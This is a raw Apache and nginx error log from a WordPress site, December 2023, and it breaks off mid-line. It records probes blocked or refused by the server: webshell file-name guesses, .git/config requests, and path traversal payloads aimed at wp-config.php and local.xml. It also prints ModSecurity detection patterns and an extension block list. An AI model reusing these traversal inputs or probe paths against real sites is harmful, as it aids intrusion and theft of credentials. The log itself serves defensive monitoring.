(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 06 05:47:04.970766 2023] [autoindex:error] [pid 10529:tid 140380418840320] [client 94.156.64.235:59940] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 06 05:47:07.120246 2023] [autoindex:error] [pid 9588:tid 140380393662208] [client 94.156.64.235:59948] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 06 05:47:12.793826 2023] [:error] [pid 10529:tid 140380385269504] [client 94.156.64.235:59966] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Wed Dec 06 05:47:23.645440 2023] [:error] [pid 9588:tid 140380343305984] [client 94.156.64.235:59998] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Dec 06 05:47:47.944348 2023] [:error] [pid 9590:tid 140380360091392] [client 94.156.64.235:60088] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/my1.php [Wed Dec 06 05:47:59.825884 2023] [:error] [pid 10529:tid 140380418840320] [client 94.156.64.235:60126] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Wed Dec 06 05:48:13.252929 2023] [:error] [pid 9590:tid 140380547303168] [client 94.156.64.235:60168] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Dec 06 05:48:23.143123 2023] [autoindex:error] [pid 9588:tid 140380393662208] [client 94.156.64.235:60198] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 06 05:48:59.016446 2023] [autoindex:error] [pid 9588:tid 140380318127872] [client 94.156.64.235:60306] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 06 10:56:18.590421 2023] [:error] [pid 10529:tid 140380301342464] [client 190.116.46.174:37524] [client 190.116.46.174] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:tk_qs. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: & found within REQUEST_COOKIES:tk_qs: target=stats_switch_view&view=month&_en=jetpack_wpa_click&_ui=141915479&_ut=wpcom%3Auser_id&_ul=jcorroq23&_ts=1701878180253&_tz=5&_lg=es-419&_pf=Win32&_ht=768&_wd=1360&_sx=0&_sy=100&_dl=https%3A%2F%2Finvestigacionperu.com%2Fwp-admin%2Fadmin.php%3Fpage%3Djetpack%23%2Fdashboard&_dr=https%3A%2F%2Finvestigacionperu.com%2Fwp-admin%2Findex.php"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-json/jetpack/v4/module/stats/data"] [unique_id "ZXCZoja7WMrRLm5ZBhDz6AAAANc"], referer: https://investigacionperu.com/wp-admin/admin.php?page=jetpack [Wed Dec 06 10:56:26.144257 2023] [:error] [pid 10529:tid 140380444018432] [client 190.116.46.174:37532] [client 190.116.46.174] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:tk_qs. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within REQUEST_COOKIES:tk_qs: target=view_detailed_stats&_en=jetpack_wpa_click&_ui=141915479&_ut=wpcom%3Auser_id&_ul=jcorroq23&_ts=1701878187800&_tz=5&_lg=es-419&_pf=Win32&_ht=768&_wd=1360&_sx=0&_sy=400&_dl=https%3A%2F%2Finvestigacionperu.com%2Fwp-admin%2Fadmin.php%3Fpage%3Djetpack%23%2Fdashboard&_dr=https%3A%2F%2Finvestigacionperu.com%2Fwp-admin%2Findex.php"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin.php"] [unique_id "ZXCZqja7WMrRLm5ZBhDz6wAAAMY"], referer: https://investigacionperu.com/wp-admin/admin.php?page=jetpack 2023/12/06 18:33:32 [error] 9550#9550: *117268 access forbidden by rule, client: 185.220.102.252, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/12/06 18:33:34 [error] 9550#9550: *117270 access forbidden by rule, client: 195.176.3.20, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Wed Dec 06 22:52:31.509685 2023] [:error] [pid 9588:tid 140380402054912] [client 212.95.50.77:48828] [client 212.95.50.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZXFBfxsa_43M_DRonVZTpAAAAAs"] [Thu Dec 07 09:12:02.547586 2023] [:error] [pid 18898:tid 140664381589248] [client 192.42.116.176:34476] [client 192.42.116.176] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZXHSsiu9VGro4oPXd-kKegAAAM4"] [Thu Dec 07 19:16:12.600484 2023] [:error] [pid 15000:tid 140664348018432] [client 23.129.64.221:45512] [client 23.129.64.221] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZXJgTFLwgg1VPWd-G4U75wAAANI"] [Fri Dec 08 05:14:19.270072 2023] [:error] [pid 27739:tid 140099585029888] [client 185.235.146.29:54162] [client 185.235.146.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZXLse2mgEnmiswew_7toNQAAAAg"] [Fri Dec 08 15:16:57.960730 2023] [:error] [pid 28359:tid 140099601815296] [client 23.129.64.134:35236] [client 23.129.64.134] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZXN5ueEDCdSp0T1UxXlDQQAAAMY"] [Sat Dec 09 01:12:20.380182 2023] [:error] [pid 27741:tid 140099703895808] [client 185.174.136.114:44660] [client 185.174.136.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZXQFRPsjP0w9qYm89wRTvQAAAII"] [Mon Dec 11 11:24:23.514408 2023] [authz_core:error] [pid 7385:tid 140258800793344] [client 167.99.182.39:47602] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Mon Dec 11 11:24:24.240247 2023] [authz_core:error] [pid 7386:tid 140258742044416] [client 142.93.158.96:47606] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/12/11 11:24:25 [error] 7344#7344: *188972 access forbidden by rule, client: 167.99.182.39, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/12/11 11:24:26 [error] 7343#7343: *188979 access forbidden by rule, client: 142.93.158.96, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Dec 11 15:25:16.565634 2023] [authz_core:error] [pid 22254:tid 140258733651712] [client 46.101.103.192:52280] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/12/11 15:25:20 [error] 7343#7343: *191872 access forbidden by rule, client: 46.101.103.192, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Dec 11 16:19:49.744214 2023] [autoindex:error] [pid 7385:tid 140258708473600] [client 51.91.107.148:52892] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Mon Dec 11 17:37:49.472971 2023] [authz_core:error] [pid 7966:tid 140258953221888] [client 162.243.161.105:54092] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/12/11 17:37:51 [error] 7343#7343: *192994 access forbidden by rule, client: 162.243.161.105, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/12/11 20:00:03 [error] 7343#7343: *194395 access forbidden by rule, client: 79.120.76.144, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Dec 13 18:44:07.791142 2023] [autoindex:error] [pid 23671:tid 139786790582016] [client 192.185.4.73:55038] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Thu Dec 14 16:35:59.498267 2023] [autoindex:error] [pid 7544:tid 140461586962176] [client 98.70.50.162:43492] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Dec 16 02:29:22.202406 2023] [:error] [pid 31582:tid 140666545858304] [client 41.216.188.92:52606] [client 41.216.188.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_HEADERS:content-configdir. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_HEADERS:content-configdir: ../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/backup-backup/includes/backup-heart.php"] [unique_id "ZX1R0uvXc6ZzZZVbBwFAbQAAAIo"] [Sat Dec 16 05:55:08.713157 2023] [autoindex:error] [pid 22385:tid 140428779153152] [client 193.202.110.27:55980] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/PHPMailer/index.php [Sat Dec 16 13:00:13.505396 2023] [autoindex:error] [pid 22985:tid 140428854687488] [client 54.37.121.239:34242] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Sat Dec 16 13:00:15.840470 2023] [autoindex:error] [pid 22985:tid 140428935358208] [client 54.37.121.239:34246] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Sun Dec 17 06:11:45.527531 2023] [:error] [pid 5001:tid 140240673040128] [client 62.146.170.207:37846] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwenty/404.php:10 [Sun Dec 17 06:11:45.527605 2023] [:error] [pid 5001:tid 140240673040128] [client 62.146.170.207:37846] Stack trace: [Sun Dec 17 06:11:45.527626 2023] [:error] [pid 5001:tid 140240673040128] [client 62.146.170.207:37846] #0 {main} [Sun Dec 17 06:11:45.527713 2023] [:error] [pid 5001:tid 140240673040128] [client 62.146.170.207:37846] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/404.php on line 10 [Sun Dec 17 06:11:50.540238 2023] [autoindex:error] [pid 5003:tid 140240605898496] [client 62.146.170.207:37862] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com//wp-includes/js/tinymce/skins/lightgray/fonts/index.php [Sun Dec 17 07:27:06.216799 2023] [:error] [pid 5001:tid 140240496793344] [client 62.146.238.167:39572] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwenty/404.php:10 [Sun Dec 17 07:27:06.216884 2023] [:error] [pid 5001:tid 140240496793344] [client 62.146.238.167:39572] Stack trace: [Sun Dec 17 07:27:06.216895 2023] [:error] [pid 5001:tid 140240496793344] [client 62.146.238.167:39572] #0 {main} [Sun Dec 17 07:27:06.216967 2023] [:error] [pid 5001:tid 140240496793344] [client 62.146.238.167:39572] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/404.php on line 10 [Sun Dec 17 07:27:18.572098 2023] [autoindex:error] [pid 5001:tid 140240622683904] [client 62.146.238.167:39588] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://investigacionperu.com//wp-includes/js/tinymce/skins/lightgray/fonts/index.php [Tue Dec 19 08:21:24.063969 2023] [:error] [pid 8459:tid 139981037172480] [client 154.61.74.7:35112] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php, referer: http://simplesite.com [Thu Dec 21 13:27:52.078711 2023] [:error] [pid 18384:tid 139688744531712] [client 104.248.229.153:41802] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/amfeed/main/download"] [unique_id "ZYSDqDfILleKq7Fa4RQKhgAAAFI"] [Thu Dec 21 13:27:52.732867 2023] [:error] [pid 18384:tid 139688965768960] [client 104.248.229.153:41804] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi-importer/web/download_file.php"] [unique_id "ZYSDqDfILleKq7Fa4RQKhwAAAEA"] [Thu Dec 21 13:27:53.283562 2023] [:error] [pid 18384:tid 139688957376256] [client 104.248.229.153:41806] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi/web/download_file.php"] [unique_id "ZYSDqTfILleKq7Fa4RQKiAAAAEE"] [Thu Dec 21 13:27:53.711500 2023] [:error] [pid 18384:tid 139688794887936] [client 104.248.229.153:41808] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/magmi-importer/conf/magmi.ini"] [unique_id "ZYSDqTfILleKq7Fa4RQKiQAAAEw"] [Thu Dec 21 13:27:54.196526 2023] [:error] [pid 18385:tid 139688786495232] [client 104.248.229.153:41810] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/magmi/conf/magmi.ini"] [unique_id "ZYSDqiPL0RbwM6lxJFVqOwAAAI0"] [Fri Dec 22 01:12:05.178792 2023] [autoindex:error] [pid 12998:tid 139688948983552] [client 172.233.152.115:32768] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Dec 23 19:17:31.963482 2023] [authz_core:error] [pid 4948:tid 140698154100480] [client 159.65.58.104:47904] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sat Dec 23 19:17:33.005279 2023] [authz_core:error] [pid 4948:tid 140698263205632] [client 134.122.89.242:47912] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/12/23 19:17:35 [error] 4876#4876: *395881 access forbidden by rule, client: 159.65.58.104, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/12/23 19:17:36 [error] 4875#4875: *395888 access forbidden by rule, client: 134.122.89.242, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Dec 23 19:52:20.428671 2023] [authz_core:error] [pid 4948:tid 140698145707776] [client 178.62.3.65:48472] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/12/23 19:52:23 [error] 4876#4876: *396261 access forbidden by rule, client: 178.62.3.65, server: 